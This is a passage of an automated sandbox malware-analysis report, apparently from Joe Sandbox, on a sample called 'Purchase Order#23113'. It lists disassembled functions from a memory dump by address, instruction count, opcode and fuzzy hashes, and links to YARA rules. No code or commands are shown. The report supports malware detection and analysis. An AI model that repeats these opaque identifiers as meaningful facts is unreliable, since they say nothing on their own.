                                                                            • Instruction ID: 945120e6c9c09e11b9f6f8db143c7edc6f79dc56e256a048ae209fe370d0189c
                                                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                            • Instruction Fuzzy Hash: 3D11C436A00915EFDB19CB58CC05B9EFBF5EF84210F058269E95597344E671AE51CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01730AD0 Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                            • Instruction ID: ee2594f3f6aa01914295660ec8516dc92154788fdb7d6d8805fb6266621dfe3b
                                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                            • Instruction Fuzzy Hash: D32106B5A00B059FD3A0CF29C440B52BBF4FB48B20F10492EE98AC7B40E371E814CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BE7E1 Relevance: .1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                            • Instruction ID: 15ace5546c928e1d04848733ddabb999a1c9d69e78c0786b0ac68a5a3460521a
                                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                            • Instruction Fuzzy Hash: E711A032640A01EFE7219F49C884BDAFBE6EF45754F059428EA099B361DF71DC40DB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017527ED Relevance: .1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cb29bce83192ba68fb00316cb87f493847d2e18dfac3709895678d5d7455c40d
                                                                            • Instruction ID: f3d5f9a6bdda6e93e39b5a28ff1725935e18b229e3b313270f7879109115faf4
                                                                            • Opcode Fuzzy Hash: cb29bce83192ba68fb00316cb87f493847d2e18dfac3709895678d5d7455c40d
                                                                            • Instruction Fuzzy Hash: 2C012B31746645ABE316526DE888F67FB9CEF41354F0900B4FD008B241DA65EC00C2A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01734690 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70a191ddd0cb19ba5949e816701469fa565a57f5dd343bc0b3aa2fe81b1417c5
                                                                            • Instruction ID: 4ed632a6124c5039d93490da236cede6793cf625b619e7964e707fbc487ee0db
                                                                            • Opcode Fuzzy Hash: 70a191ddd0cb19ba5949e816701469fa565a57f5dd343bc0b3aa2fe81b1417c5
                                                                            • Instruction Fuzzy Hash: 4B11AC76240645AFDB2ACF59D844B56BBA8EBC6B64F004119F9068B692C370E800CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01804B00 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d0881a848c7e2d2cfa864c24d1097e6aab911b06616e1d35c31ed5985ae4efb
                                                                            • Instruction ID: 76b5c44e50a96534af3c06daadccdf1fbb929cbf9732ea6e62564290df519082
                                                                            • Opcode Fuzzy Hash: 0d0881a848c7e2d2cfa864c24d1097e6aab911b06616e1d35c31ed5985ae4efb
                                                                            • Instruction Fuzzy Hash: E9110632240A199FD7639AADDC54F16B7A5FFC4310F144419EB82C72D0DA30EA02CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01766620 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f14a8d4ded1a2dc0591d611498461ef692651cd008ed3bb2f8bfe791ff26ef0
                                                                            • Instruction ID: abcc6b844414f7049207a782eba389a3837f3f474673bf0a44811c167c7689da
                                                                            • Opcode Fuzzy Hash: 6f14a8d4ded1a2dc0591d611498461ef692651cd008ed3bb2f8bfe791ff26ef0
                                                                            • Instruction Fuzzy Hash: 1211A572A00716ABDB22EF59D984B5EFBBCFF84750F900555EE05A7245D730ED018B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0175EA2E Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5acb2c4d6bae207407b85493715242f033775cab8eb03bbdbf2d813b0d6e8876
                                                                            • Instruction ID: 075613905a4eaa140f2f8c45fc6492f2ecded067f8c04fc5debb2de9ad82f95c
                                                                            • Opcode Fuzzy Hash: 5acb2c4d6bae207407b85493715242f033775cab8eb03bbdbf2d813b0d6e8876
                                                                            • Instruction Fuzzy Hash: 4E01DE7154010A9FD326DF28D408FA6FBF9EB81314F20816AE5048B665DBB0AE82CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0175E53E Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                            • Instruction ID: 0975cd785177768574dddeab8d335876e358734f04c6550815d7bcff5234af6b
                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                            • Instruction Fuzzy Hash: 721108722056C29BEB239B2CE948B25FFD4FB01758F2900E1DE45C7642FB78CA46C650
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BE75D Relevance: .1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                            • Instruction ID: e4976abaf543776d5b35805a7161d271b8da536e7198735f9eacf6c706833c3e
                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                            • Instruction Fuzzy Hash: 9D019272600105AFE7219F59C884FDAFBA9EB85760F058474EA059B364EB75DD80C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0172A250 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                            • Instruction ID: 3d1a10d03f39aef32267bb68beaabdbd5529b6e0ec4c971b06f8f0ba2a54fef4
                                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                            • Instruction Fuzzy Hash: AF01D6715097329BCB318F19D840A36FBE5EF96760701896DFD958BA81D731D402CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01804940 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2020a1afabaf8d591ea6e646ae0e407ac5fa901e3249ba268b09830aa3b0176
                                                                            • Instruction ID: 871c3b4b3109086364694ef0f9d6ddb62d4a2da1fe551aa419521af4c0d82eb4
                                                                            • Opcode Fuzzy Hash: c2020a1afabaf8d591ea6e646ae0e407ac5fa901e3249ba268b09830aa3b0176
                                                                            • Instruction Fuzzy Hash: BD010432581519ABC373DF1C9C04E12B7A8EB81370B264265EA68DB1F6D730DA11CBC0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017AE1D0 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ace15db1c2048c74275e8ac56629c03acce7a66d2d2a24dc82fb63170d37d41b
                                                                            • Instruction ID: 9d092239de26b570c24fce9548523023e6b667cbe7a5eb414774ea633a112ee2
                                                                            • Opcode Fuzzy Hash: ace15db1c2048c74275e8ac56629c03acce7a66d2d2a24dc82fb63170d37d41b
                                                                            • Instruction Fuzzy Hash: 9211AD32241641EFDB16EF19CD84F56BBB8FF98B94F2000A5EE059B6A1D735ED01CA90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01736259 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 710bdb2fb78d7b96e7e45d3e613ba59bd338cf654ffaa99916c7f40b0e6b34f3
                                                                            • Instruction ID: 96be2725ea63ee56e34e6350edb5494e9a19403286d5a0273f57e4324478b096
                                                                            • Opcode Fuzzy Hash: 710bdb2fb78d7b96e7e45d3e613ba59bd338cf654ffaa99916c7f40b0e6b34f3
                                                                            • Instruction Fuzzy Hash: BB115A71641229ABDF36AB64CC46FE9B278FF44710F5041D4A328A60E1EB709E81CF88
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B6050 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3b71d33ef09b1f7e0b5656e0f6e1ff26233485763a1bd724bd06f6cc4364616d
                                                                            • Instruction ID: af2767dab99a1654015c000dd43437c9913c7adf28f163dcd6895660eb29ab8e
                                                                            • Opcode Fuzzy Hash: 3b71d33ef09b1f7e0b5656e0f6e1ff26233485763a1bd724bd06f6cc4364616d
                                                                            • Instruction Fuzzy Hash: 85112973900019ABCB22DB95CC84EEFBB7CEF48254F044166E906E7211EA34EA15CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0173208A Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                            • Instruction ID: bace1b893963c836053ae1431bdca96490ae1891fe35d18012eea28f43b3556a
                                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                            • Instruction Fuzzy Hash: F20124332001108BEF52AA2DD880B96FB67BFC4700F1540A9ED458F25BEA71CC81C7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C6500 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d375e413fe5cd4e064e9437424ae91a9d87ab87be54dc0baa22f5306e7fec531
                                                                            • Instruction ID: c9c983518139e97d087743435c50688c802d31d6eac5c2a3b218e0e754d39415
                                                                            • Opcode Fuzzy Hash: d375e413fe5cd4e064e9437424ae91a9d87ab87be54dc0baa22f5306e7fec531
                                                                            • Instruction Fuzzy Hash: CD11A1726441469FD711CF58E840BA6FBB9FB6A714F28815DF8488B315D732ED81CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BC810 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f2165dfd67633bde1ce61db7483006b91a3e471830d306b78926964444e7134
                                                                            • Instruction ID: b885c83a566efeb4524ac22cc5d212e21480198462f01885413847068a84ee74
                                                                            • Opcode Fuzzy Hash: 6f2165dfd67633bde1ce61db7483006b91a3e471830d306b78926964444e7134
                                                                            • Instruction Fuzzy Hash: 1D111CB1A002099BCB00DF99D585AAEF7F4FF58250F10806AE905E7355D674EA01CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017DEA60 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a0825075c2befabaa088d9e86e1f345fa7a1d7b8d8b2e44b8c83efe46d858c5
                                                                            • Instruction ID: 78139bf63f242e6d49c2fbcf1ddf7a0adbc917860500326c4bbaa734e5f8be6e
                                                                            • Opcode Fuzzy Hash: 3a0825075c2befabaa088d9e86e1f345fa7a1d7b8d8b2e44b8c83efe46d858c5
                                                                            • Instruction Fuzzy Hash: 8001B1311402269FCB33AA198844936FBB9FF91660B54446AF6455F211CF209E81CBD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0172C020 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                            • Instruction ID: a8296f2b5ee79dad8c6962276dbc8979dc6dc9e21921fa74713f73baa76319ca
                                                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                            • Instruction Fuzzy Hash: 880128321007059FEB33A6A9C804EABF7E9FFD5250F14441AEA468B580DE74E442CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017720F0 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a000b3bab4d8fb681175b739bb439689fb6a48a735d952ff60307c986cac8761
                                                                            • Instruction ID: 8fe279d1a051c88b5c4a597b33899a9e1436fefbac8fc451f30a355523b20368
                                                                            • Opcode Fuzzy Hash: a000b3bab4d8fb681175b739bb439689fb6a48a735d952ff60307c986cac8761
                                                                            • Instruction Fuzzy Hash: 7D116D35A0120DEFDF15DF64D854FAEBBB5FB44240F004059F91697255E635AE11CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176E5CF Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f60be33aff69699e02281ed3d046f41be1de6761d05c77a1b8436b5fd23e71b
                                                                            • Instruction ID: b9e9fa1d9b2d3f27572bdcef0ab22b668ea0bf28a8a01170787cd444cd4ca027
                                                                            • Opcode Fuzzy Hash: 3f60be33aff69699e02281ed3d046f41be1de6761d05c77a1b8436b5fd23e71b
                                                                            • Instruction Fuzzy Hash: C401A771201511BFD311BB7DCD88E57FBACFF946547100625B60983691DB64EC11C6E4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C69C0 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9adf4901c828b6c7fa2cd3f3ac7b9a3a46574d0ddc214dc8e42b2c5254185545
                                                                            • Instruction ID: 9d99189efc057a62ca1d10bb027a8f45daf055008bae180905b63b404e810f9d
                                                                            • Opcode Fuzzy Hash: 9adf4901c828b6c7fa2cd3f3ac7b9a3a46574d0ddc214dc8e42b2c5254185545
                                                                            • Instruction Fuzzy Hash: 0301FC32214212DBD720DF6DC88896BFBE8FF54B60F11412DF95987280E7309A01C7D1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BC460 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5e5ffe8c2b92bb067e3d0cb55299bcf3f279418cfa1e83839d1a7d6f42486919
                                                                            • Instruction ID: 411f13e29e3958d3c304f5a26b11cdf375032548c474ce45ffe496184c0a4e89
                                                                            • Opcode Fuzzy Hash: 5e5ffe8c2b92bb067e3d0cb55299bcf3f279418cfa1e83839d1a7d6f42486919
                                                                            • Instruction Fuzzy Hash: 91115B71A01209EBDF16EFA8C884EEEBBB5FB48240F008059F90197344DB38EE11DB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BC97C Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5dac5bbe84519c455ea12314a638bb4d03b7922b5ac4fa43a95091f4423b18cd
                                                                            • Instruction ID: 41a591b60f7b10ec8d2576917092b3339b419104144b8e6906bd3cb9fffb519c
                                                                            • Opcode Fuzzy Hash: 5dac5bbe84519c455ea12314a638bb4d03b7922b5ac4fa43a95091f4423b18cd
                                                                            • Instruction Fuzzy Hash: C41139B16193099FC710DF69D445A9BFBE4FF98710F00855AF998D7395E630E900CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01804A80 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                            • Instruction ID: e367e4c6868d41fb7176e6a6e009154d543d9a2caf65bd19f5e59713fabdcda7
                                                                            • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                            • Instruction Fuzzy Hash: 6A01B5322406099FDB629A99DC44E56B7E6FBC5310F044419EB42CB690DAB1F980C754
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BCA11 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61bbdf7a0e562960a90d9b4ec08d26c9ee6c13bf1611c85429579bc0df2b6644
                                                                            • Instruction ID: 7818b17e0e818332a6c86fddbe78777b51597032d4ebe4239731cec55d316b29
                                                                            • Opcode Fuzzy Hash: 61bbdf7a0e562960a90d9b4ec08d26c9ee6c13bf1611c85429579bc0df2b6644
                                                                            • Instruction Fuzzy Hash: BC1179B16083089FC710DF69C485A9BFBE4FF99350F00851AF998D73A4E630E900CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0174E016 Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                            • Instruction ID: f071b29c9915aba8204431dbb13597158596fc771e04defe0e302dfe7d164aed
                                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                            • Instruction Fuzzy Hash: 85017C322405809FE322961DC948F36FBE8FF85764F1904A1FA15CBAA2DB3CDC40C621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0172826B Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8af8126e2c749867642f79811e16e61f83ce14f418386f7cf197312fbcb7c87d
                                                                            • Instruction ID: 2db2d8508f2520a3c327ae5811f65f1b9f74c0ffdb68e1ab0169da36e7c49112
                                                                            • Opcode Fuzzy Hash: 8af8126e2c749867642f79811e16e61f83ce14f418386f7cf197312fbcb7c87d
                                                                            • Instruction Fuzzy Hash: AD014731704514DBC714EB69EC18AAEF7E8FF45220B154029DA02EB344EE30DE02C792
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017DEB50 Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e52321342c1cb2c7a8439147f447de10f8f362cd59267acddae6ebff9f1a86ab
                                                                            • Instruction ID: 6ec637ae1b01ad7f6d03771133892196e22f9ae24d2dff4dee0fefe1a249c698
                                                                            • Opcode Fuzzy Hash: e52321342c1cb2c7a8439147f447de10f8f362cd59267acddae6ebff9f1a86ab
